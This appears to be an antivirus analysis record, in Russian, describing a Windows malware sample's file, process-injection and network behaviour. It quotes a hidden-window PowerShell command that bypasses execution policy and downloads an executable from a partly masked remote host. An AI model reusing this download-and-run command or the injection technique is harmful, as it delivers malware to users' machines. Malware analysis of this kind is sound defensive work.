Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://sa#######e-ibmcloud.kozow.com/dlmwptb_signed_tw.exe как %appdata%\dlmwptb_signed_tw.exe
Внедряет код в
следующие пользовательские процессы:
- ieinstal.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abctfhghgdghghž.sct
- %APPDATA%\dlmwptb_signed_tw.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://sa#######e-ibmcloud.kozow.com/dlmwptb_Signed_tw.exe
- http://sp#######nce-cloud.gleeze.com/buts/71qWCcTcD1gIFZIEsa2yFFvgXpYFs50JT6ukG/dbvg
UDP
- DNS ASK sa#######e-ibmcloud.kozow.com
- DNS ASK sp#######nce-cloud.gleeze.com
- DNS ASK lo#g.af
Другое
Создает и запускает на исполнение
- '%APPDATA%\dlmwptb_signed_tw.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://sa#######e-ibmcloud.kozow.com/dlmwptb_Signed_tw.exe','%APPDATA%\dlmwpt...' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles(x86)%\internet explorer\ieinstal.exe'
